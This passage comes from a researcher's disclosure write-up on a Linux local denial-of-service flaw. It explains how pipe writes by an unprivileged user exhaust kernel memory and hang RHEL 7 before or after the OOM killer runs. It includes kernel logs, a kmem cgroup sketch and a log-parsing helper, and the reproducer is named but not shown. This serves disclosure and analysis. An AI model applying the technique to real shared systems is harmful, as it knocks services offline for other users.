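def configure_kmem_limit(cgroup_dir, limit_bytes, pid=None):
    """Set a kernel memory limit on a cgroup v1 memory group.

    cgroup_dir is the directory of the group, e.g. (assumed mount point)
    /sys/fs/cgroup/memory/untrusted. On a real cgroup filesystem, creating
    the directory makes the kernel populate the control files.
    """
    os.makedirs(cgroup_dir, exist_ok=True)

    # Step 1: set the kernel memory limit while the group is still empty.
    limit_file = os.path.join(cgroup_dir, "memory.kmem.limit_in_bytes")
    with open(limit_file, "w") as f:
        f.write(str(limit_bytes))

    # Step 2: optionally move a process into the group.
    if pid is not None:
        procs_file = os.path.join(cgroup_dir, "cgroup.procs")
        with open(procs_file, "w") as f:
            f.write(str(pid))


if __name__ == "__main__":
    # Demo against a scratch directory, so nothing on the system is changed.
    scratch = tempfile.mkdtemp()
    group = os.path.join(scratch, "untrusted")  # hypothetical group name
    configure_kmem_limit(group, 64 * 1024 * 1024, pid=os.getpid())
    print(sorted(os.listdir(group)))
```

Which value is "appropriate" depends on the workload, and this sketch does not try to answer that.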


2.4 How did I try to handle this vulnerability?

The discussion took place on a non-public mailing list for handling vulnerabilities ( security@kernel.org ). But this vulnerability was considered "not worth addressing seriously". The arguments raised are listed below, each followed by my reaction (→).

·In the first place, allowing untrusted local users to log in is the administrators' fault.

  →If privilege escalation bugs which can be exploited by local users are addressed immediately, why are local DoS attacks which can be exploited by local users not addressed immediately as well?

·We can mitigate by configuring kmemcg (in memory cgroup) appropriately.

  →In the first place, can we really configure kmemcg appropriately? And why abandon administrators who use older kernels which do not support kmemcg?

·There are other ways to attack.

  → Since I have experience with access control modules such as CaitSith, I proposed an LSM module which restricts available file descriptors based on conditions such as user ID and/or group ID. But that module was not accepted, because it was judged "too grandiose a change for addressing this problem".

As a result, the situation remained without any solution.


In the meantime, RHEL 7 beta was released in December 2013.

systemd was introduced, and many procedures such as starting/stopping daemon processes were put under the control of systemd. Also, while the default filesystem for RHEL 6 was ext4, the default filesystem for RHEL 7 became xfs.

"I was able to terminate almost all daemon processes in RHEL6. Does the same thing happen in RHEL7?"

With that question in mind, I tried RHEL 7 beta with the GUI environment installed. However ···


Something was wrong when I ran the reproducer program on RHEL 7 beta.

I expected almost all processes to be killed by the OOM killer. But in reality, the whole system sometimes froze, either before or after the OOM killer was invoked.

---------- Example output of a hang up before OOM killer is invoked start ----------
( I pressed SysRq-m to display memory information, because the system had not responded for 1 minute after pipe-memeater2 was started. )
[  143.112366] SysRq : Show Memory
[  143.114964] Mem-Info:
[  143.116515] Node 0 DMA per-cpu:
[  143.118718] CPU    0: hi:    0, btch:   1 usd:   0
[  143.121888] CPU    1: hi:    0, btch:   1 usd:   0
[  143.125057] CPU    2: hi:    0, btch:   1 usd:   0
[  143.128223] CPU    3: hi:    0, btch:   1 usd:   0
[  143.131423] Node 0 DMA32 per-cpu:
[  143.133751] CPU    0: hi:  186, btch:  31 usd:   0
[  143.136898] CPU    1: hi:  186, btch:  31 usd:   0
[  143.140448] CPU    2: hi:  186, btch:  31 usd:   0
[  143.141648] CPU    3: hi:  186, btch:  31 usd:   0
[  143.142848] active_anon:94430 inactive_anon:2419 isolated_anon:0
[  143.142848]  active_file:25 inactive_file:27 isolated_file:46
[  143.142848]  unevictable:0 dirty:25 writeback:0 unstable:0
[  143.142848]  free:13044 slab_reclaimable:5548 slab_unreclaimable:8850
[  143.142848]  mapped:856 shmem:2589 pagetables:5786 bounce:0
[  143.142848]  free_cma:0
[  143.150637] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  143.160561] lowmem_reserve[]: 0 1802 1802 1802
[  143.161866] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  143.172186] lowmem_reserve[]: 0 0 0 0
[  143.172895] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB
[  143.175751] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB
[  143.178506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  143.180035] 2666 total pagecache pages
[  143.180639] 0 pages in swap cache
[  143.181175] Swap cache stats: add 0, delete 0, find 0/0
[  143.182004] Free swap  = 0kB
[  143.182471] Total swap = 0kB
[  143.185995] 524287 pages RAM
[  143.186492] 54799 pages reserved
[  143.187047] 527642 pages shared
[  143.187555] 453340 pages non-shared
( I pressed SysRq-f to invoke the OOM killer manually, because the OOM killer was not invoked automatically even though DMA32's free: was already below the min: watermark. )
[  160.509185] SysRq : Manual OOM execution
[  160.512561] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0
[  160.517679] kworker/0:2 cpuset=/ mems_allowed=0
[  160.520700] CPU: 0 PID: 185 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1
[  160.525619] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  160.532031] Workqueue: events moom_callback
[  160.533408]  ffff880036c24fa0 000000007dd3d9cb ffff880036dd1c70 ffffffff815e19ba
[  160.535875]  ffff880036dd1d00 ffffffff815dd02d ffff88005f108bf0 ffff88005f108bf0
[  160.538324]  ffff88007f674580 ffff88007f674ea8 ffff880036dd1d98 0000000000000046
[  160.540795] Call Trace:
[  160.541572]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[  160.543176]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[  160.544824]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[  160.546618]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[  160.548444]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[  160.550420]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[  160.552152]  [<ffffffff8137bc3d>] moom_callback+0x4d/0x50
[  160.553828]  [<ffffffff8107e02b>] process_one_work+0x17b/0x460
[  160.555643]  [<ffffffff8107edfb>] worker_thread+0x11b/0x400
[  160.557365]  [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400
[  160.559215]  [<ffffffff81085aef>] kthread+0xcf/0xe0
[  160.560758]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  160.562806]  [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0
[  160.563824]  [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140
[  160.564921] Mem-Info:
[  160.565325] Node 0 DMA per-cpu:
[  160.565860] CPU    0: hi:    0, btch:   1 usd:   0
[  160.566631] CPU    1: hi:    0, btch:   1 usd:   0
[  160.567617] CPU    2: hi:    0, btch:   1 usd:   0
[  160.568414] CPU    3: hi:    0, btch:   1 usd:   0
[  160.569198] Node 0 DMA32 per-cpu:
[  160.569771] CPU    0: hi:  186, btch:  31 usd:   0
[  160.570542] CPU    1: hi:  186, btch:  31 usd:   0
[  160.571392] CPU    2: hi:  186, btch:  31 usd:   0
[  160.572164] CPU    3: hi:  186, btch:  31 usd:   0
[  160.572948] active_anon:94430 inactive_anon:2419 isolated_anon:0
[  160.572948]  active_file:25 inactive_file:27 isolated_file:46
[  160.572948]  unevictable:0 dirty:25 writeback:0 unstable:0
[  160.572948]  free:13044 slab_reclaimable:5548 slab_unreclaimable:8850
[  160.572948]  mapped:856 shmem:2589 pagetables:5786 bounce:0
[  160.572948]  free_cma:0
[  160.578891] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  160.585529] lowmem_reserve[]: 0 1802 1802 1802
[  160.586429] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  160.593312] lowmem_reserve[]: 0 0 0 0
[  160.594029] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB
[  160.596790] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB
[  160.599652] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  160.601103] 2666 total pagecache pages
[  160.601703] 0 pages in swap cache
[  160.602691] Swap cache stats: add 0, delete 0, find 0/0
[  160.603580] Free swap  = 0kB
[  160.604072] Total swap = 0kB
[  160.607456] 524287 pages RAM
[  160.607980] 54799 pages reserved
[  160.608499] 527635 pages shared
[  160.609024] 453340 pages non-shared
[  160.609599] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  160.610967] [  572]     0   572     9232      522      19        0             0 systemd-journal
[  160.612373] [  591]     0   591    29620       80      25        0             0 lvmetad
[  160.613750] [  613]     0   613    11094      414      22        0         -1000 systemd-udevd
[  160.615158] [  707]     0   707    12803      102      24        0         -1000 auditd
[  160.616465] [  720]     0   720    20056       16       9        0             0 audispd
[  160.618066] [  729]     0   729     4189       43      13        0             0 alsactl
[  160.619369] [  730]     0   730     6551       49      18        0             0 sedispatch
[  160.620697] [  732]   172   732    41164       55      16        0             0 rtkit-daemon
[  160.622183] [  734]     0   734     6612       86      16        0             0 systemd-logind
[  160.623558] [  735]     0   735    61592      373      63        0             0 vmtoolsd
[  160.624863] [  739]     0   739    80894     4240      77        0             0 firewalld
[  160.626244] [  745]   995   745     2133       36       9        0             0 lsmd
[  160.627506] [  746]     0   746    96840      194      40        0             0 accounts-daemon
[  160.628884] [  747]     0   747    84088      287      66        0             0 ModemManager
[  160.630335] [  749]     0   749    32515      128      19        0             0 smartd
[  160.631591] [  752]   994   752    28961       92      28        0             0 chronyd
[  160.632883] [  756]     0   756    71323      513      39        0             0 rsyslogd
[  160.634400] [  757]     0   757    52615      443      53        0             0 abrtd
[  160.635671] [  759]     0   759    51993      340      54        0             0 abrt-watch-log
[  160.637062] [  760]    32   760    16227      131      35        0             0 rpcbind
[  160.638471] [  763]     0   763    51993      341      50        0             0 abrt-watch-log
[  160.639847] [  766]     0   766     1094       23       8        0             0 rngd
[  160.641159] [  768]     0   768     4829       78      14        0             0 irqbalance
[  160.642469] [  770]    81   770     7580      425      19        0          -900 dbus-daemon
[  160.643811] [  777]     0   777    50842      115      39        0             0 gssproxy
[  160.645177] [  807]    70   807     7549       77      20        0             0 avahi-daemon
[  160.646534] [  815]     0   815    28811       58      11        0             0 ksmtuned
[  160.647818] [  816]     0   816    26974       22      10        0             0 sleep
[  160.649127] [  817]   999   817   132837     2083      57        0             0 polkitd
[  160.650499] [  818]    70   818     7518       60      18        0             0 avahi-daemon
[  160.651906] [  880]     0   880   113613      994      74        0             0 NetworkManager
[  160.653405] [ 1077]     0  1077    13266      145      28        0             0 wpa_supplicant
[  160.654788] [ 1198]     0  1198    27631     3113      56        0             0 dhclient
[  160.656100] [ 1408]     0  1408   138261     2652      87        0             0 tuned
[  160.657411] [ 1409]     0  1409    20640      213      42        0         -1000 sshd
[  160.658661] [ 1416]     0  1416   138875     1130     141        0             0 libvirtd
[  160.659944] [ 1422]     0  1422    31583      150      18        0             0 crond
[  160.661296] [ 1423]     0  1423     6491       49      16        0             0 atd
[  160.662511] [ 1424]     0  1424   118308      759      51        0             0 gdm
[  160.663729] [ 1427]     0  1427    27509       31      11        0             0 agetty
[  160.665053] [ 2285]     0  2285    61020     4487     104        0             0 Xorg
[  160.666283] [ 2567]     0  2567    23306      253      44        0             0 master
[  160.667674] [ 2568]    89  2568    23332      252      45        0             0 pickup
[  160.669045] [ 2569]    89  2569    23349      251      45        0             0 qmgr
[  160.670312] [ 2580]     0  2580    64751      993      57        0          -900 abrt-dbus
[  160.671620] [ 2707]    99  2707     3888       48      11        0             0 dnsmasq
[  160.672985] [ 2708]     0  2708     3881       45      10        0             0 dnsmasq
[  160.674256] [ 2746]     0  2746    90874      322      61        0             0 upowerd
[  160.675546] [ 2770]   997  2770   101041      371      50        0             0 colord
[  160.676902] [ 2778]    42  2778   111507      299      75        0             0 pulseaudio
[  160.678231] [ 2791]     0  2791     4975       48      14        0             0 systemd-localed
[  160.679607] [ 2828]     0  2828   101278      258      47        0             0 packagekitd
[  160.681005] [ 2870]     0  2870    92702      783      45        0             0 udisksd
[  160.682294] [ 2913]     0  2913    80155      235      56        0          -900 realmd
[  160.683551] [ 2976]     0  2976    93324      821      70        0             0 gdm-session-wor
[  160.685488] [ 2992]  1000  2992    97458      200      40        0             0 gnome-keyring-d
[  160.687246] [ 3034]  1000  3034   162279      508     112        0             0 gnome-session
[  160.688795] [ 3041]  1000  3041     3488       36      10        0             0 dbus-launch
[  160.690170] [ 3042]  1000  3042     7460      298      17        0             0 dbus-daemon
[  160.691540] [ 3106]  1000  3106    76642      165      36        0             0 gvfsd
[  160.692986] [ 3110]  1000  3110    90285      685      44        0             0 gvfsd-fuse
[  160.694345] [ 3178]  1000  3178    13216      144      26        0             0 ssh-agent
[  160.695703] [ 3194]  1000  3194    84999      151      34        0             0 at-spi-bus-laun
[  160.697166] [ 3198]  1000  3198     7171      108      18        0             0 dbus-daemon
[  160.698535] [ 3201]  1000  3201    32423      159      32        0             0 at-spi2-registr
[  160.700025] [ 3213]  1000  3213   308215     2987     217        0             0 gnome-settings-
[  160.701605] [ 3230]  1000  3230   119864      373      93        0             0 pulseaudio
[  160.702984] [ 3236]     0  3236     9863       91      23        0             0 bluetoothd
[  160.704616] [ 3248]     0  3248     4972       49      13        0             0 systemd-hostnam
[  160.706041] [ 3250]  1000  3250   399482    27809     312        0             0 gnome-shell
[  160.707405] [ 3263]     0  3263    47748      273      47        0             0 cupsd
[  160.708758] [ 3287]  1000  3287   129195      382      96        0             0 gsd-printer
[  160.710124] [ 3317]  1000  3317   117500      523      49        0             0 ibus-daemon
[  160.711601] [ 3322]  1000  3322    98216      174      44        0             0 ibus-dconf
[  160.713041] [ 3324]  1000  3324   113063      487     104        0             0 ibus-x11
[  160.714394] [ 3329]  1000  3329   132651     1039      79        0             0 gnome-shell-cal
[  160.715891] [ 3337]  1000  3337    80472      397      57        0             0 mission-control
[  160.717428] [ 3341]  1000  3341   143879      597      92        0             0 caribou
[  160.718742] [ 3343]  1000  3343   178351     1094     144        0             0 goa-daemon
[  160.720151] [ 3358]  1000  3358    83626      372      90        0             0 goa-identity-se
[  160.721577] [ 3382]  1000  3382   100148      245      48        0             0 gvfs-udisks2-vo
[  160.723002] [ 3393]  1000  3393   105443      809      54        0             0 gvfs-afc-volume
[  160.724476] [ 3399]  1000  3399   167235      855     154        0             0 evolution-sourc
[  160.725990] [ 3406]  1000  3406    78121      167      37        0             0 gvfs-mtp-volume
[  160.727476] [ 3412]  1000  3412    74935      139      33        0             0 gvfs-goa-volume
[  160.728902] [ 3419]  1000  3419    80390      181      44        0             0 gvfs-gphoto2-vo
[  160.730326] [ 3435]  1000  3435   215425     2108     157        0             0 nautilus
[  160.731786] [ 3446]  1000  3446   182851     1697     136        0             0 tracker-extract
[  160.733214] [ 3447]  1000  3447    94351      915     125        0             0 vmtoolsd
[  160.734650] [ 3448]  1000  3448   117460      674      74        0             0 tracker-miner-a
[  160.736095] [ 3449]  1000  3449   117430      623      75        0             0 tracker-miner-u
[  160.737520] [ 3451]  1000  3451   140588     1248      82        0             0 tracker-miner-f
[  160.739047] [ 3460]  1000  3460   134177     1162      66        0             0 tracker-store
[  160.740605] [ 3462]  1000  3462   112871     1244     135        0             0 abrt-applet
[  160.741951] [ 3550]  1000  3550    37459      108      31        0             0 gconfd-2
[  160.743318] [ 3565]  1000  3565    79800      168      42        0             0 ibus-engine-sim
[  160.744710] [ 3587]  1000  3587   117863      187      47        0             0 gvfsd-trash
[  160.746059] [ 3624]  1000  3624   267938     9317     185        0             0 evolution-calen
[  160.747531] [ 3630]  1000  3630    59682      143      38        0             0 gvfsd-metadata
[  160.748929] [ 3649]  1000  3649   138689     1816     121        0             0 gnome-terminal-
[  160.750307] [ 3652]  1000  3652     2122       32       9        0             0 gnome-pty-helpe
[  160.751902] [ 3653]  1000  3653    29140      406      14        0             0 bash
[  160.753144] [ 3695]  1000  3695     1042       21       7        0             1 pipe-memeater2
[  160.754680] [ 3696]  1000  3696     1042       21       7        0             1 pipe-memeater2
[  160.756054] [ 3697]  1000  3697     1042       21       7        0             1 pipe-memeater2
[  160.757442] [ 3698]  1000  3698     1042       21       7        0             1 pipe-memeater2
[  160.758876] [ 3699]  1000  3699     1042       21       7        0             1 pipe-memeater2
[  160.760282] [ 3700]  1000  3700     1042       21       7        0             1 pipe-memeater2
[  160.761678] [ 3701]  1000  3701     1042       21       7        0             1 pipe-memeater2
[  160.763303] [ 3702]  1000  3702     1042       21       7        0             1 pipe-memeater2
[  160.764761] [ 3703]  1000  3703     1042       21       7        0             1 pipe-memeater2
[  160.766153] [ 3704]  1000  3704     1042       21       7        0             1 pipe-memeater2
[  160.767683] [ 3706]  1000  3706     1042       21       7        0             0 pipe-memeater2
[  160.769049] Out of memory: Kill process 3250 (gnome-shell) score 59 or sacrifice child
[  160.770424] Killed process 3317 (ibus-daemon) total-vm:470000kB, anon-rss:2092kB, file-rss:0kB
( I pressed SysRq-m to display memory information, because the system was still not responding. )
[  196.095694] SysRq : Show Memory
[  196.098000] Mem-Info:
[  196.099641] Node 0 DMA per-cpu:
[  196.101846] CPU    0: hi:    0, btch:   1 usd:   0
[  196.105035] CPU    1: hi:    0, btch:   1 usd:   0
[  196.109063] CPU    2: hi:    0, btch:   1 usd:   0
[  196.112459] CPU    3: hi:    0, btch:   1 usd:   0
[  196.115794] Node 0 DMA32 per-cpu:
[  196.118128] CPU    0: hi:  186, btch:  31 usd:   0
[  196.121276] CPU    1: hi:  186, btch:  31 usd:   0
[  196.124455] CPU    2: hi:  186, btch:  31 usd:   0
[  196.126846] CPU    3: hi:  186, btch:  31 usd:   0
[  196.128674] active_anon:94430 inactive_anon:2419 isolated_anon:0
[  196.128674]  active_file:25 inactive_file:27 isolated_file:46
[  196.128674]  unevictable:0 dirty:25 writeback:0 unstable:0
[  196.128674]  free:13046 slab_reclaimable:5548 slab_unreclaimable:8850
[  196.128674]  mapped:856 shmem:2589 pagetables:5786 bounce:0
[  196.128674]  free_cma:0
[  196.140606] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  196.155788] lowmem_reserve[]: 0 1802 1802 1802
[  196.157371] Node 0 DMA32 free:44616kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5288kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  196.164536] lowmem_reserve[]: 0 0 0 0
[  196.165466] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB
[  196.168336] Node 0 DMA32: 3297*4kB (UEM) 1564*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44724kB
[  196.171141] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  196.172490] 2666 total pagecache pages
[  196.173179] 0 pages in swap cache
[  196.173715] Swap cache stats: add 0, delete 0, find 0/0
[  196.174547] Free swap  = 0kB
[  196.175015] Total swap = 0kB
[  196.178556] 524287 pages RAM
[  196.179082] 54799 pages reserved
[  196.179605] 527628 pages shared
[  196.180114] 453338 pages non-shared
( I pressed SysRq-b to reboot the system, because the OOM killer was still not invoked automatically even though DMA32's free: was still below the min: watermark. )
[  208.678839] SysRq : Resetting
---------- Example output of a hang up before OOM killer is invoked end ----------
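
The notes in the output above compare DMA32's free: value with its min: watermark by eye. The same comparison can be done mechanically on the per-zone lines. This is only a sketch: the function name zones_below_min is made up, the regular expression assumes the log format shown here (3.10.0-123.el7), and SAMPLE is an abbreviated copy of two lines from the first SysRq-m output.

```python
import re

# Matches per-zone lines such as
#   "Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB ..."
# It does not match the "per-cpu:" or buddy-list ("Node 0 DMA32: 3297*4kB") lines.
ZONE_RE = re.compile(
    r"Node (\d+) (\S+) free:(\d+)kB min:(\d+)kB low:(\d+)kB high:(\d+)kB"
)


def zones_below_min(log_text):
    """Return (node, zone, free_kb, min_kb) for zones whose free is below min."""
    hits = []
    for m in ZONE_RE.finditer(log_text):
        node, zone = int(m.group(1)), m.group(2)
        free_kb, min_kb = int(m.group(3)), int(m.group(4))
        if free_kb < min_kb:
            hits.append((node, zone, free_kb, min_kb))
    return hits


# Abbreviated lines from the SysRq-m output at 143 seconds.
SAMPLE = """\
[  143.150637] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB
[  143.161866] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB
"""

if __name__ == "__main__":
    for node, zone, free_kb, min_kb in zones_below_min(SAMPLE):
        print(f"Node {node} {zone}: free {free_kb}kB < min {min_kb}kB "
              f"(short by {min_kb - free_kb}kB)")
```

For the sample lines, only DMA32 is reported: free is 44608kB against a min of 44668kB, that is 60kB short, while the DMA zone is well above its watermark.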
---------- Example output of a hang up after OOM killer is invoked start ----------
( I pressed SysRq-m to display memory information before starting pipe-memeater2. )
[   75.434294] SysRq : Show Memory
[   75.436621] Mem-Info:
[   75.438188] Node 0 DMA per-cpu:
[   75.440491] CPU    0: hi:    0, btch:   1 usd:   0
[   75.443676] CPU    1: hi:    0, btch:   1 usd:   0
[   75.446920] CPU    2: hi:    0, btch:   1 usd:   0
[   75.450100] CPU    3: hi:    0, btch:   1 usd:   0
[   75.453282] Node 0 DMA32 per-cpu:
[   75.455657] CPU    0: hi:  186, btch:  31 usd: 149
[   75.458830] CPU    1: hi:  186, btch:  31 usd: 159
[   75.461469] CPU    2: hi:  186, btch:  31 usd: 139
[   75.462882] CPU    3: hi:  186, btch:  31 usd:  90
[   75.464299] active_anon:54015 inactive_anon:2094 isolated_anon:0
[   75.464299]  active_file:7055 inactive_file:58983 isolated_file:0
[   75.464299]  unevictable:0 dirty:8 writeback:0 unstable:0
[   75.464299]  free:311926 slab_reclaimable:6382 slab_unreclaimable:7573
[   75.464299]  mapped:21931 shmem:2263 pagetables:3993 bounce:0
[   75.464299]  free_cma:0
[   75.473555] Node 0 DMA free:9484kB min:384kB low:480kB high:576kB active_anon:2192kB inactive_anon:104kB active_file:160kB inactive_file:2540kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:672kB shmem:124kB slab_reclaimable:232kB slab_unreclaimable:456kB kernel_stack:56kB pagetables:108kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   75.485351] lowmem_reserve[]: 0 1802 1802 1802
[   75.486883] Node 0 DMA32 free:1238220kB min:44668kB low:55832kB high:67000kB active_anon:213868kB inactive_anon:8272kB active_file:28060kB inactive_file:233392kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:32kB writeback:0kB mapped:87052kB shmem:8928kB slab_reclaimable:25296kB slab_unreclaimable:29836kB kernel_stack:4408kB pagetables:15864kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   75.496482] lowmem_reserve[]: 0 0 0 0
[   75.497196] Node 0 DMA: 5*4kB (UM) 3*8kB (UE) 2*16kB (EM) 2*32kB (UM) 2*64kB (UM) 2*128kB (M) 3*256kB (UEM) 2*512kB (EM) 1*1024kB (E) 3*2048kB (EMR) 0*4096kB = 9484kB
[   75.500108] Node 0 DMA32: 141*4kB (UEM) 116*8kB (UEM) 39*16kB (UEM) 18*32kB (UEM) 10*64kB (M) 10*128kB (UM) 7*256kB (UM) 8*512kB (UM) 7*1024kB (EM) 4*2048kB (UEM) 296*4096kB (MR) = 1238276kB
[   75.503370] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   75.504729] 68301 total pagecache pages
[   75.505351] 0 pages in swap cache
[   75.505903] Swap cache stats: add 0, delete 0, find 0/0
[   75.506758] Free swap  = 0kB
[   75.507230] Total swap = 0kB
[   75.511170] 524287 pages RAM
[   75.511675] 54799 pages reserved
[   75.512203] 600924 pages shared
[   75.512738] 132132 pages non-shared
( I started pipe-memeater2 here. )
[   78.806223] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0
[   78.811173] pipe-memeater2 cpuset=/ mems_allowed=0
[   78.814287] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1
[   78.818717] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   78.821857]  ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba
[   78.824265]  ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50
[   78.826634]  0000000000000206 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff
[   78.829363] Call Trace:
[   78.830134]  [<ffffffff815e19ba>] dump_stack+0x19/0x1b
[   78.831676]  [<ffffffff815dd02d>] dump_header+0x8e/0x214
[   78.833289]  [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0
[   78.834899]  [<ffffffff81102eff>] ? delayacct_end+0x8f/0xb0
[   78.836528]  [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0
[   78.838236]  [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0
[   78.839990]  [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30
[   78.841859]  [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0
[   78.843493]  [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10
[   78.845350]  [<ffffffff81188779>] alloc_pages_current+0xa9/0x170
[   78.847179]  [<ffffffff811b8954>] pipe_write+0x274/0x540
[   78.848826]  [<ffffffff811af36d>] do_sync_write+0x8d/0xd0
[   78.849928]  [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0
[   78.850887]  [<ffffffff811b0558>] SyS_write+0x58/0xb0
[   78.851837]  [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b
[   78.852928] Mem-Info:
[   78.853402] Node 0 DMA per-cpu:
[   78.854021] CPU    0: hi:    0, btch:   1 usd:   0
[   78.854911] CPU    1: hi:    0, btch:   1 usd:   0
[   78.855790] CPU    2: hi:    0, btch:   1 usd:   0
[   78.856674] CPU    3: hi:    0, btch:   1 usd:   0
[   78.857558] Node 0 DMA32 per-cpu:
[   78.858201] CPU    0: hi:  186, btch:  31 usd:  52
[   78.859080] CPU    1: hi:  186, btch:  31 usd: 165
[   78.859963] CPU    2: hi:  186, btch:  31 usd:  46
[   78.860848] CPU    3: hi:  186, btch:  31 usd: 182
[   78.861729] active_anon:54067 inactive_anon:2094 isolated_anon:0
[   78.861729]  active_file:15 inactive_file:114 isolated_file:0
